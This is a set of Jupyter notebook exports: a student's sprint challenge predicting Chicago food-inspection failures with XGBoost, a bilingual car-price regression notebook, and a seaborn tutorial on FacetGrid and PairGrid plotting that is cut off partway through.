"<a href=\"https://colab.research.google.com/github/gagansingh23/DS-Unit-2-Applied-Modeling/blob/master/Gagan_Singh_DS11_Sprint_Challenge_7.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"_Lambda School Data Science, Unit 2_\n\n# Applied Modeling Sprint Challenge: Predict Chicago food inspections 🍕",
"_____no_output_____"
],
[
"For this Sprint Challenge, you'll use a dataset with information from inspections of restaurants and other food establishments in Chicago from January 2010 to March 2019. \n\n[See this PDF](https://data.cityofchicago.org/api/assets/BAD5301B-681A-4202-9D25-51B2CAE672FF) for descriptions of the data elements included in this dataset.\n\nAccording to [Chicago Department of Public Health — Food Protection Services](https://www.chicago.gov/city/en/depts/cdph/provdrs/healthy_restaurants/svcs/food-protection-services.html), \"Chicago is home to 16,000 food establishments like restaurants, grocery stores, bakeries, wholesalers, lunchrooms, mobile food vendors and more. Our business is food safety and sanitation with one goal, to prevent the spread of food-borne disease. We do this by inspecting food businesses, responding to complaints and food recalls.\" ",
"_____no_output_____"
],
[
"#### Your challenge: Predict whether inspections failed\n\nThe target is the `Fail` column.\n\n- When the food establishment failed the inspection, the target is `1`.\n- When the establishment passed, the target is `0`.",
"_____no_output_____"
],
[
"#### Run this cell to install packages in Colab:",
"_____no_output_____"
]
],
[
[
"%%capture\nimport sys\n\nif 'google.colab' in sys.modules:\n # Install packages in Colab\n !pip install category_encoders==2.*\n !pip install eli5\n !pip install pandas-profiling==2.*\n !pip install pdpbox\n !pip install shap",
"_____no_output_____"
]
],
[
[
"#### Run this cell to load the data:",
"_____no_output_____"
]
],
[
[
"import pandas as pd\n\ntrain_url = 'https://drive.google.com/uc?export=download&id=13_tP9JpLcZHSPVpWcua4t2rY44K_s4H5'\ntest_url = 'https://drive.google.com/uc?export=download&id=1GkDHjsiGrzOXoF_xcYjdzBTSjOIi3g5a'\n\ntrain = pd.read_csv(train_url)\ntest = pd.read_csv(test_url)\n\nassert train.shape == (51916, 17)\nassert test.shape == (17306, 17)",
"_____no_output_____"
],
[
"#Installers\nimport category_encoders as ce\nfrom sklearn.model_selection import train_test_split\nfrom xgboost import XGBClassifier\nfrom sklearn.metrics import roc_auc_score\nfrom pdpbox.pdp import pdp_isolate, pdp_plot\nimport matplotlib.pyplot as plt\nfrom pdpbox.pdp import pdp_interact, pdp_interact_plot",
"_____no_output_____"
]
],
[
[
"### Part 1: Preprocessing\n\nYou may choose which features you want to use, and whether/how you will preprocess them. If you use categorical features, you may use any tools and techniques for encoding.\n\n_To earn a score of 3 for this part, find and explain leakage. The dataset has a feature that will give you an ROC AUC score > 0.90 if you process and use the feature. Find the leakage and explain why the feature shouldn't be used in a real-world model to predict the results of future inspections._\n\n### Part 2: Modeling\n\n**Fit a model** with the train set. (You may use scikit-learn, xgboost, or any other library.) Use cross-validation or do a three-way split (train/validate/test) and **estimate your ROC AUC** validation score.\n\nUse your model to **predict probabilities** for the test set. **Get an ROC AUC test score >= 0.60.**\n\n_To earn a score of 3 for this part, get an ROC AUC test score >= 0.70 (without using the feature with leakage)._\n\n\n### Part 3: Visualization\n\nMake visualizations for model interpretation. (You may use any libraries.) Choose two of these types:\n\n- Confusion Matrix\n- Permutation Importances\n- Partial Dependence Plot, 1 feature isolation\n- Partial Dependence Plot, 2 features interaction\n- Shapley Values\n\n_To earn a score of 3 for this part, make four of these visualization types._",
"_____no_output_____"
],
[
"## Part 1: Preprocessing\n\n> You may choose which features you want to use, and whether/how you will preprocess them. If you use categorical features, you may use any tools and techniques for encoding.",
"_____no_output_____"
]
],
[
[
"#Feature Selection\ntrain.describe(exclude='number').nunique()\n",
"_____no_output_____"
],
[
"train.columns",
"_____no_output_____"
],
[
"train.Fail.value_counts(normalize=True)",
"_____no_output_____"
],
[
"train_pratice = train[train['Violations'].str.contains(\"HAZARD\", na=False)]\ntrain_pratice.Fail.value_counts(normalize=True)",
"_____no_output_____"
],
[
"target = 'Fail'\ntrain_features = train.drop(columns=[target])\n\ncardinality = train_features.select_dtypes(exclude='number').nunique()\ncategorical_features = cardinality[cardinality <= 40].index.tolist()\nnumerical_features = train_features.select_dtypes(include='number').columns.tolist()\ncategorical_features",
"_____no_output_____"
],
[
"features = categorical_features + numerical_features",
"_____no_output_____"
],
[
"X_train = train[features]\ny_train = train[target]\n\nX_val = val[features]\ny_val = val[target]\n\nX_test = test[features]\ny_test = test[features]",
"_____no_output_____"
],
[
"#One Hot Encode all categorical variables with low cardinality\nencoder = ce.OneHotEncoder()\nX_train_encoded = encoder.fit_transform(X_train)\nX_val_encoded = encoder.transform(X_val)",
"_____no_output_____"
]
],
[
[
"## Part 2: Modeling\n\n> **Fit a model** with the train set. (You may use scikit-learn, xgboost, or any other library.) Use cross-validation or do a three-way split (train/validate/test) and **estimate your ROC AUC** validation score.\n>\n> Use your model to **predict probabilities** for the test set. **Get an ROC AUC test score >= 0.60.**",
"_____no_output_____"
]
],
[
[
"#Perform a three way split\ntrain, val = train_test_split(train, train_size=0.90, test_size=0.10, \n stratify=train['Fail'], random_state=42)\n\n\ntrain.shape, val.shape, test.shape",
"_____no_output_____"
],
[
"#Fit The Model \nmodel = XGBClassifier(n_estimators=100, n_jobs=-1)\n\nmodel.fit(X_train_encoded, y_train)",
"_____no_output_____"
],
[
"#prediction on train set\ny_pred = model.predict(X_val_encoded)\n\n\nroc_auc_score(y_val, y_pred)",
"_____no_output_____"
],
[
"#Since its classifier, we need to use predicted probailities not discrete. \ny_pred_proba = model.predict_proba(X_val_encoded)[:,-1]\nprint('Test ROC Score', roc_auc_score(y_val, y_pred_proba))",
"Test ROC Score 0.7166206725605222\n"
]
],
[
[
"## Part 3: Visualization\n\n> Make visualizations for model interpretation. (You may use any libraries.) Choose two of these types:\n>\n> - Permutation Importances\n> - Partial Dependence Plot, 1 feature isolation\n> - Partial Dependence Plot, 2 features interaction\n> - Shapley Values",
"_____no_output_____"
],
[
"**Partial Dependance Plot, 1 feature isolation**",
"_____no_output_____"
]
],
[
[
"features",
"_____no_output_____"
],
[
"target = 'Fail'\nfeatures = train.columns.drop([target])\n\nX = train[features]\ny = train[target]\n\nencoder = ce.OrdinalEncoder()\nX_encoded = encoder.fit_transform(X)\n\nmodel = XGBClassifier(n_estimators=100, random_state=42, n_jobs=-1)\nmodel.fit(X_encoded, y)",
"_____no_output_____"
],
[
"from pdpbox import pdp\nfeature = 'Risk'\n\npdp_dist = pdp.pdp_isolate(model=model, dataset=X_encoded, model_features=features,\n feature=feature)\n\npdp.pdp_plot(pdp_dist, feature);",
"findfont: Font family ['Arial'] not found. Falling back to DejaVu Sans.\nfindfont: Font family ['Arial'] not found. Falling back to DejaVu Sans.\nfindfont: Font family ['Arial'] not found. Falling back to DejaVu Sans.\nfindfont: Font family ['Arial'] not found. Falling back to DejaVu Sans.\n"
]
],
[
[
"**Partial Dependance Plot, 2 Feature Interaction**\n",
"_____no_output_____"
]
],
[
[
"features = ['Risk', 'Inspection Type']\n\ninteractions = pdp_interact(\n model=model,\n dataset=X_encoded,\n model_features=X_encoded.columns,\n features=features\n)\npdp_interact_plot(interactions, plot_type='grid', feature_names=features);",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2aa33fedbb9be43ab1694c41e6aabdad0d5f92 | 14,336 | ipynb | Jupyter Notebook | Car_Price_Prediction_.ipynb | aruanalucena/Car-Price-Prediction-Machine-Learning | 592ba604cc5d048f80fdd15bc40d80a42fecf25a | [
"MIT"
] | 2 | 2021-07-21T20:07:07.000Z | 2021-07-21T20:07:08.000Z | Car_Price_Prediction_.ipynb | aruanalucena/Car-Price-Prediction-Machine-Learning | 592ba604cc5d048f80fdd15bc40d80a42fecf25a | [
"MIT"
] | null | null | null | Car_Price_Prediction_.ipynb | aruanalucena/Car-Price-Prediction-Machine-Learning | 592ba604cc5d048f80fdd15bc40d80a42fecf25a | [
"MIT"
] | null | null | null | 23.656766 | 268 | 0.467146 | [
[
[
"<a href=\"https://colab.research.google.com/github/aruanalucena/Car-Price-Prediction-Machine-Learning/blob/main/Car_Price_Prediction_.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"# **Car Price Prediction with python**.\n# **Previsão de carrro com Python**.\n",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
],
[
[
"%%html\n<h1><marquee style='width: 100% ', font color= 'arrows';><b>Car Price Prediction </b></marquee></h1>",
"_____no_output_____"
]
],
[
[
"# Importing the Dependencies\n# <font color = 'blue'> Importando as bibliotecas\n***",
"_____no_output_____"
]
],
[
[
"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import Lasso\nfrom sklearn import metrics",
"_____no_output_____"
]
],
[
[
"# Data Collection and Data Analisys\n# <font color='blue'> Coleta e Análise dos Dados\n\n- loading the data from csv file to pandas DataFrame\n-<font color='blue'> Carregando o dados em csv para o pandas DataFrame\n***",
"_____no_output_____"
]
],
[
[
"car_data= pd.read_csv('/content/car data.csv')",
"_____no_output_____"
],
[
"print(car_data)",
"_____no_output_____"
],
[
"car_data.head()",
"_____no_output_____"
]
],
[
[
"- Checking the number of rows and columns in the data frame\n-<font color='blue'> Checando numero de linhas e colunas do data frame\n***",
"_____no_output_____"
]
],
[
[
"car_data.shape",
"_____no_output_____"
]
],
[
[
"- Getting some information about the dataset\n-<font color='blue'> Pegando algumas informações dos dados\n***",
"_____no_output_____"
]
],
[
[
"car_data.info()",
"_____no_output_____"
]
],
[
[
"- Checking the number of missing values \n-<font color='blue'> Checando o numero de valores faltantes\n***",
"_____no_output_____"
]
],
[
[
"car_data.isnull().sum()",
"_____no_output_____"
]
],
[
[
"- Checking the distribution of categorical data\n-<font color='blue'> Checando a distribuição dos dados categoricos\n***",
"_____no_output_____"
]
],
[
[
"print(car_data.Fuel_Type.value_counts())\nprint(car_data.Seller_Type.value_counts())\nprint(car_data.Transmission.value_counts())",
"_____no_output_____"
]
],
[
[
"- Encoding the Categorical Data\n- <font color='blue'> Codificação de dados categoricos\n",
"_____no_output_____"
]
],
[
[
"# encoding \"Fuel_Type\"Column\ncar_data.replace({'Fuel_Type' :{'Petrol':0,'Diesel':1,'CNG':2}},inplace=True)\n\n# encoding \"Seller_Type\"Column\ncar_data.replace({'Seller_Type' :{'Dealer':0,'Individual':1}},inplace=True)\n\n# encoding \"Transmission\"Column\ncar_data.replace({'Transmission' :{'Manual':0,'Automatic':1}},inplace=True)",
"_____no_output_____"
],
[
"car_data.head()",
"_____no_output_____"
]
],
[
[
"- Splitting the data into Training data and Test data\n- <font color='blue'> Divisão do dados en treino e teste\n***",
"_____no_output_____"
]
],
[
[
"X = car_data.drop(['Car_Name', 'Selling_Price'], axis=1)\n\nY = car_data['Selling_Price']",
"_____no_output_____"
],
[
"print(X)\nprint(Y)",
"_____no_output_____"
]
],
[
[
"- Splitting the data target\n- <font color='blue'> \n***\n",
"_____no_output_____"
]
],
[
[
"X_train, X_test, Y_train, Y_test = train_test_split(X,Y, test_size=0.1, random_state=2)",
"_____no_output_____"
]
],
[
[
"- Model Training --> Linear Regression\n-<font color='blue'>Modelo de Treino --> Linear regression \n***",
"_____no_output_____"
],
[
"# Construindo o Modelo \n- Training the Model\n-<font color='blue'> Treinando o Modelo\n***",
"_____no_output_____"
],
[
"- Loading the Model\n- <font color='blue'>Carregando o Modelo",
"_____no_output_____"
]
],
[
[
"lin_reg_model = LinearRegression()",
"_____no_output_____"
],
[
"lin_reg_model.fit(X_train, Y_train)",
"_____no_output_____"
]
],
[
[
"# Avaliação do Modelo",
"_____no_output_____"
],
[
"- Model Evaluation\n-<font color='blue'>Avaliação do Modelo\n\n- Accuracy on training data\n- <font color = 'blue'>Precisão dos dados de treino\n*** ",
"_____no_output_____"
]
],
[
[
"train_data_prediction = lin_reg_model.predict(X_train)\nprint(train_data_prediction)",
"_____no_output_____"
]
],
[
[
"- R squared error\n- <font color = 'blue'>R erro quadratico\n***",
"_____no_output_____"
]
],
[
[
"error_score = metrics.r2_score(Y_train, train_data_prediction)\nprint(' R squared Error : ', error_score)\n",
"_____no_output_____"
]
],
[
[
"- Visualizing the actual Prices and predicted prices\n- <font color = 'blue'>Visualização dos preços reais e dos preços previstos\n***",
"_____no_output_____"
]
],
[
[
"plt.scatter(Y_train, train_data_prediction)\nplt.xlabel( 'Actual Prices/Preço Atual')\nplt.ylabel('Predicted Prices / Preço Previsto')\nplt.title('Actual prices vs Predicted Price')\nplt.show()\n",
"_____no_output_____"
],
[
"test_data_prediction = lin_reg_model.predict(X_test)",
"_____no_output_____"
],
[
"error_score = metrics.r2_score(Y_test, test_data_prediction)\nprint(\" R squared Error : \", error_score)",
"_____no_output_____"
],
[
"plt.scatter(Y_test, test_data_prediction)\nplt.xlabel( 'Actual Prices/Preço Atual')\nplt.ylabel('Predicted Prices / Preço Previsto')\nplt.title('Actual prices vs Predicted Price')\nplt.show()",
"_____no_output_____"
]
],
[
[
"# Lasso Regression",
"_____no_output_____"
]
],
[
[
"lass_reg_model = Lasso()",
"_____no_output_____"
],
[
"lass_reg_model.fit(X_train, Y_train)",
"_____no_output_____"
],
[
"train_data_prediction = lass_reg_model.predict(X_train)\nprint(train_data_prediction)",
"_____no_output_____"
],
[
"train_data_prediction= lass_reg_model.predict(X_train)",
"_____no_output_____"
],
[
"error_score = metrics.r2_score(Y_test, test_data_prediction)\nprint(' R squared Error : ', error_score)",
"_____no_output_____"
],
[
"plt.scatter(Y_test, test_data_prediction)\nplt.xlabel( 'Actual Prices/Preço Atual')\nplt.ylabel('Predicted Prices / Preço Previsto')\nplt.title('Actual prices vs Predicted Price')\nplt.show()",
"_____no_output_____"
]
],
[
[
"# The end\n***",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2aa6b556e689dbe8b4e80c5c6801976f401c6f | 22,590 | ipynb | Jupyter Notebook | doc/tutorial/axis_grids.ipynb | yaoxingcheng/seaborn | 37147cf9dfeee1bfc0fabf26da3ad197769f9b41 | [
"BSD-3-Clause"
] | 2 | 2019-05-27T04:32:12.000Z | 2019-06-10T15:28:22.000Z | doc/tutorial/axis_grids.ipynb | nils-werner/seaborn | b9551aff1e2b020542a5fb610fec468b69b87c6e | [
"MIT",
"BSD-3-Clause"
] | null | null | null | doc/tutorial/axis_grids.ipynb | nils-werner/seaborn | b9551aff1e2b020542a5fb610fec468b69b87c6e | [
"MIT",
"BSD-3-Clause"
] | 1 | 2020-05-16T20:55:34.000Z | 2020-05-16T20:55:34.000Z | 37.277228 | 1,059 | 0.616246 | [
[
[
".. _grid_tutorial:\n\n.. currentmodule:: seaborn",
"_____no_output_____"
],
[
"Building structured multi-plot grids\n====================================\n\n.. raw:: html\n\n <div class=col-md-9>\n",
"_____no_output_____"
],
[
"When exploring medium-dimensional data, a useful approach is to draw multiple instances of the same plot on different subsets of your dataset. This technique is sometimes called either \"lattice\" or \"trellis\" plotting, and it is related to the idea of `\"small multiples\" <https://en.wikipedia.org/wiki/Small_multiple>`_. It allows a viewer to quickly extract a large amount of information about complex data. Matplotlib offers good support for making figures with multiple axes; seaborn builds on top of this to directly link the structure of the plot to the structure of your dataset.\n\nTo use these features, your data has to be in a Pandas DataFrame and it must take the form of what Hadley Whickam calls `\"tidy\" data <https://vita.had.co.nz/papers/tidy-data.pdf>`_. In brief, that means your dataframe should be structured such that each column is a variable and each row is an observation.\n\nFor advanced use, you can use the objects discussed in this part of the tutorial directly, which will provide maximum flexibility. Some seaborn functions (such as :func:`lmplot`, :func:`catplot`, and :func:`pairplot`) also use them behind the scenes. Unlike other seaborn functions that are \"Axes-level\" and draw onto specific (possibly already-existing) matplotlib ``Axes`` without otherwise manipulating the figure, these higher-level functions create a figure when called and are generally more strict about how it gets set up. In some cases, arguments either to those functions or to the constructor of the class they rely on will provide a different interface attributes like the figure size, as in the case of :func:`lmplot` where you can set the height and aspect ratio for each facet rather than the overall size of the figure. Any function that uses one of these objects will always return it after plotting, though, and most of these objects have convenience methods for changing how the plot is drawn, often in a more abstract and easy way.",
"_____no_output_____"
]
],
[
[
"import seaborn as sns\nimport matplotlib.pyplot as plt",
"_____no_output_____"
],
[
"sns.set(style=\"ticks\")",
"_____no_output_____"
],
[
"%matplotlib inline\nimport numpy as np\nnp.random.seed(sum(map(ord, \"axis_grids\")))",
"_____no_output_____"
]
],
[
[
".. _facet_grid:\n\nConditional small multiples\n---------------------------\n\nThe :class:`FacetGrid` class is useful when you want to visualize the distribution of a variable or the relationship between multiple variables separately within subsets of your dataset. A :class:`FacetGrid` can be drawn with up to three dimensions: ``row``, ``col``, and ``hue``. The first two have obvious correspondence with the resulting array of axes; think of the hue variable as a third dimension along a depth axis, where different levels are plotted with different colors.\n\nThe class is used by initializing a :class:`FacetGrid` object with a dataframe and the names of the variables that will form the row, column, or hue dimensions of the grid. These variables should be categorical or discrete, and then the data at each level of the variable will be used for a facet along that axis. For example, say we wanted to examine differences between lunch and dinner in the ``tips`` dataset.\n\nAdditionally, each of :func:`relplot`, :func:`catplot`, and :func:`lmplot` use this object internally, and they return the object when they are finished so that it can be used for further tweaking.",
"_____no_output_____"
]
],
[
[
"tips = sns.load_dataset(\"tips\")",
"_____no_output_____"
],
[
"g = sns.FacetGrid(tips, col=\"time\")",
"_____no_output_____"
]
],
[
[
"Initializing the grid like this sets up the matplotlib figure and axes, but doesn't draw anything on them.\n\nThe main approach for visualizing data on this grid is with the :meth:`FacetGrid.map` method. Provide it with a plotting function and the name(s) of variable(s) in the dataframe to plot. Let's look at the distribution of tips in each of these subsets, using a histogram.",
"_____no_output_____"
]
],
[
[
"g = sns.FacetGrid(tips, col=\"time\")\ng.map(plt.hist, \"tip\");",
"_____no_output_____"
]
],
[
[
"This function will draw the figure and annotate the axes, hopefully producing a finished plot in one step. To make a relational plot, just pass multiple variable names. You can also provide keyword arguments, which will be passed to the plotting function:",
"_____no_output_____"
]
],
[
[
"g = sns.FacetGrid(tips, col=\"sex\", hue=\"smoker\")\ng.map(plt.scatter, \"total_bill\", \"tip\", alpha=.7)\ng.add_legend();",
"_____no_output_____"
]
],
[
[
"There are several options for controlling the look of the grid that can be passed to the class constructor.",
"_____no_output_____"
]
],
[
[
"g = sns.FacetGrid(tips, row=\"smoker\", col=\"time\", margin_titles=True)\ng.map(sns.regplot, \"size\", \"total_bill\", color=\".3\", fit_reg=False, x_jitter=.1);",
"_____no_output_____"
]
],
[
[
"Note that ``margin_titles`` isn't formally supported by the matplotlib API, and may not work well in all cases. In particular, it currently can't be used with a legend that lies outside of the plot.\n\nThe size of the figure is set by providing the height of *each* facet, along with the aspect ratio:",
"_____no_output_____"
]
],
[
[
"g = sns.FacetGrid(tips, col=\"day\", height=4, aspect=.5)\ng.map(sns.barplot, \"sex\", \"total_bill\");",
"_____no_output_____"
]
],
[
[
"The default ordering of the facets is derived from the information in the DataFrame. If the variable used to define facets has a categorical type, then the order of the categories is used. Otherwise, the facets will be in the order of appearance of the category levels. It is possible, however, to specify an ordering of any facet dimension with the appropriate ``*_order`` parameter:",
"_____no_output_____"
]
],
[
[
"ordered_days = tips.day.value_counts().index\ng = sns.FacetGrid(tips, row=\"day\", row_order=ordered_days,\n height=1.7, aspect=4,)\ng.map(sns.distplot, \"total_bill\", hist=False, rug=True);",
"_____no_output_____"
]
],
[
[
"Any seaborn color palette (i.e., something that can be passed to :func:`color_palette()` can be provided. You can also use a dictionary that maps the names of values in the ``hue`` variable to valid matplotlib colors:",
"_____no_output_____"
]
],
[
[
"pal = dict(Lunch=\"seagreen\", Dinner=\"gray\")\ng = sns.FacetGrid(tips, hue=\"time\", palette=pal, height=5)\ng.map(plt.scatter, \"total_bill\", \"tip\", s=50, alpha=.7, linewidth=.5, edgecolor=\"white\")\ng.add_legend();",
"_____no_output_____"
]
],
[
[
"You can also let other aspects of the plot vary across levels of the hue variable, which can be helpful for making plots that will be more comprehensible when printed in black-and-white. To do this, pass a dictionary to ``hue_kws`` where keys are the names of plotting function keyword arguments and values are lists of keyword values, one for each level of the hue variable.",
"_____no_output_____"
]
],
[
[
"g = sns.FacetGrid(tips, hue=\"sex\", palette=\"Set1\", height=5, hue_kws={\"marker\": [\"^\", \"v\"]})\ng.map(plt.scatter, \"total_bill\", \"tip\", s=100, linewidth=.5, edgecolor=\"white\")\ng.add_legend();",
"_____no_output_____"
]
],
[
[
"If you have many levels of one variable, you can plot it along the columns but \"wrap\" them so that they span multiple rows. When doing this, you cannot use a ``row`` variable.",
"_____no_output_____"
]
],
[
[
"attend = sns.load_dataset(\"attention\").query(\"subject <= 12\")\ng = sns.FacetGrid(attend, col=\"subject\", col_wrap=4, height=2, ylim=(0, 10))\ng.map(sns.pointplot, \"solutions\", \"score\", color=\".3\", ci=None);",
"_____no_output_____"
]
],
[
[
"Once you've drawn a plot using :meth:`FacetGrid.map` (which can be called multiple times), you may want to adjust some aspects of the plot. There are also a number of methods on the :class:`FacetGrid` object for manipulating the figure at a higher level of abstraction. The most general is :meth:`FacetGrid.set`, and there are other more specialized methods like :meth:`FacetGrid.set_axis_labels`, which respects the fact that interior facets do not have axis labels. For example:",
"_____no_output_____"
]
],
[
[
"with sns.axes_style(\"white\"):\n g = sns.FacetGrid(tips, row=\"sex\", col=\"smoker\", margin_titles=True, height=2.5)\ng.map(plt.scatter, \"total_bill\", \"tip\", color=\"#334488\", edgecolor=\"white\", lw=.5);\ng.set_axis_labels(\"Total bill (US Dollars)\", \"Tip\");\ng.set(xticks=[10, 30, 50], yticks=[2, 6, 10]);\ng.fig.subplots_adjust(wspace=.02, hspace=.02);",
"_____no_output_____"
]
],
[
[
"For even more customization, you can work directly with the underling matplotlib ``Figure`` and ``Axes`` objects, which are stored as member attributes at ``fig`` and ``axes`` (a two-dimensional array), respectively. When making a figure without row or column faceting, you can also use the ``ax`` attribute to directly access the single axes.",
"_____no_output_____"
]
],
[
[
"g = sns.FacetGrid(tips, col=\"smoker\", margin_titles=True, height=4)\ng.map(plt.scatter, \"total_bill\", \"tip\", color=\"#338844\", edgecolor=\"white\", s=50, lw=1)\nfor ax in g.axes.flat:\n ax.plot((0, 50), (0, .2 * 50), c=\".2\", ls=\"--\")\ng.set(xlim=(0, 60), ylim=(0, 14));",
"_____no_output_____"
]
],
[
[
".. _custom_map_func:\n\nUsing custom functions\n----------------------\n\nYou're not limited to existing matplotlib and seaborn functions when using :class:`FacetGrid`. However, to work properly, any function you use must follow a few rules:\n\n1. It must plot onto the \"currently active\" matplotlib ``Axes``. This will be true of functions in the ``matplotlib.pyplot`` namespace, and you can call ``plt.gca`` to get a reference to the current ``Axes`` if you want to work directly with its methods.\n2. It must accept the data that it plots in positional arguments. Internally, :class:`FacetGrid` will pass a ``Series`` of data for each of the named positional arguments passed to :meth:`FacetGrid.map`.\n3. It must be able to accept ``color`` and ``label`` keyword arguments, and, ideally, it will do something useful with them. In most cases, it's easiest to catch a generic dictionary of ``**kwargs`` and pass it along to the underlying plotting function.\n\nLet's look at minimal example of a function you can plot with. This function will just take a single vector of data for each facet:",
"_____no_output_____"
]
],
[
[
"from scipy import stats\ndef quantile_plot(x, **kwargs):\n qntls, xr = stats.probplot(x, fit=False)\n plt.scatter(xr, qntls, **kwargs)\n \ng = sns.FacetGrid(tips, col=\"sex\", height=4)\ng.map(quantile_plot, \"total_bill\");",
"_____no_output_____"
]
],
[
[
"If we want to make a bivariate plot, you should write the function so that it accepts the x-axis variable first and the y-axis variable second:",
"_____no_output_____"
]
],
[
[
"def qqplot(x, y, **kwargs):\n _, xr = stats.probplot(x, fit=False)\n _, yr = stats.probplot(y, fit=False)\n plt.scatter(xr, yr, **kwargs)\n \ng = sns.FacetGrid(tips, col=\"smoker\", height=4)\ng.map(qqplot, \"total_bill\", \"tip\");",
"_____no_output_____"
]
],
[
[
"Because ``plt.scatter`` accepts ``color`` and ``label`` keyword arguments and does the right thing with them, we can add a hue facet without any difficulty:",
"_____no_output_____"
]
],
[
[
"g = sns.FacetGrid(tips, hue=\"time\", col=\"sex\", height=4)\ng.map(qqplot, \"total_bill\", \"tip\")\ng.add_legend();",
"_____no_output_____"
]
],
[
[
"This approach also lets us use additional aesthetics to distinguish the levels of the hue variable, along with keyword arguments that won't be dependent on the faceting variables:",
"_____no_output_____"
]
],
[
[
"g = sns.FacetGrid(tips, hue=\"time\", col=\"sex\", height=4,\n hue_kws={\"marker\": [\"s\", \"D\"]})\ng.map(qqplot, \"total_bill\", \"tip\", s=40, edgecolor=\"w\")\ng.add_legend();",
"_____no_output_____"
]
],
[
[
"Sometimes, though, you'll want to map a function that doesn't work the way you expect with the ``color`` and ``label`` keyword arguments. In this case, you'll want to explicitly catch them and handle them in the logic of your custom function. For example, this approach will allow use to map ``plt.hexbin``, which otherwise does not play well with the :class:`FacetGrid` API:",
"_____no_output_____"
]
],
[
[
"def hexbin(x, y, color, **kwargs):\n cmap = sns.light_palette(color, as_cmap=True)\n plt.hexbin(x, y, gridsize=15, cmap=cmap, **kwargs)\n\nwith sns.axes_style(\"dark\"):\n g = sns.FacetGrid(tips, hue=\"time\", col=\"time\", height=4)\ng.map(hexbin, \"total_bill\", \"tip\", extent=[0, 50, 0, 10]);",
"_____no_output_____"
]
],
[
[
".. _pair_grid:\n\nPlotting pairwise data relationships\n------------------------------------\n\n:class:`PairGrid` also allows you to quickly draw a grid of small subplots using the same plot type to visualize data in each. In a :class:`PairGrid`, each row and column is assigned to a different variable, so the resulting plot shows each pairwise relationship in the dataset. This style of plot is sometimes called a \"scatterplot matrix\", as this is the most common way to show each relationship, but :class:`PairGrid` is not limited to scatterplots.\n\nIt's important to understand the differences between a :class:`FacetGrid` and a :class:`PairGrid`. In the former, each facet shows the same relationship conditioned on different levels of other variables. In the latter, each plot shows a different relationship (although the upper and lower triangles will have mirrored plots). Using :class:`PairGrid` can give you a very quick, very high-level summary of interesting relationships in your dataset.\n\nThe basic usage of the class is very similar to :class:`FacetGrid`. First you initialize the grid, then you pass plotting function to a ``map`` method and it will be called on each subplot. There is also a companion function, :func:`pairplot` that trades off some flexibility for faster plotting.\n",
"_____no_output_____"
]
],
[
[
"iris = sns.load_dataset(\"iris\")\ng = sns.PairGrid(iris)\ng.map(plt.scatter);",
"_____no_output_____"
]
],
[
[
"It's possible to plot a different function on the diagonal to show the univariate distribution of the variable in each column. Note that the axis ticks won't correspond to the count or density axis of this plot, though.",
"_____no_output_____"
]
],
[
[
"g = sns.PairGrid(iris)\ng.map_diag(plt.hist)\ng.map_offdiag(plt.scatter);",
"_____no_output_____"
]
],
[
[
"A very common way to use this plot colors the observations by a separate categorical variable. For example, the iris dataset has four measurements for each of three different species of iris flowers so you can see how they differ.",
"_____no_output_____"
]
],
[
[
"g = sns.PairGrid(iris, hue=\"species\")\ng.map_diag(plt.hist)\ng.map_offdiag(plt.scatter)\ng.add_legend();",
"_____no_output_____"
]
],
[
[
"By default every numeric column in the dataset is used, but you can focus on particular relationships if you want.",
"_____no_output_____"
]
],
[
[
"g = sns.PairGrid(iris, vars=[\"sepal_length\", \"sepal_width\"], hue=\"species\")\ng.map(plt.scatter);",
"_____no_output_____"
]
],
[
[
"It's also possible to use a different function in the upper and lower triangles to emphasize different aspects of the relationship.",
"_____no_output_____"
]
],
[
[
"g = sns.PairGrid(iris)\ng.map_upper(plt.scatter)\ng.map_lower(sns.kdeplot)\ng.map_diag(sns.kdeplot, lw=3, legend=False);",
"_____no_output_____"
]
],
[
[
"The square grid with identity relationships on the diagonal is actually just a special case, and you can plot with different variables in the rows and columns.",
"_____no_output_____"
]
],
[
[
"g = sns.PairGrid(tips, y_vars=[\"tip\"], x_vars=[\"total_bill\", \"size\"], height=4)\ng.map(sns.regplot, color=\".3\")\ng.set(ylim=(-1, 11), yticks=[0, 5, 10]);",
"_____no_output_____"
]
],
[
[
"Of course, the aesthetic attributes are configurable. For instance, you can use a different palette (say, to show an ordering of the ``hue`` variable) and pass keyword arguments into the plotting functions.",
"_____no_output_____"
]
],
[
[
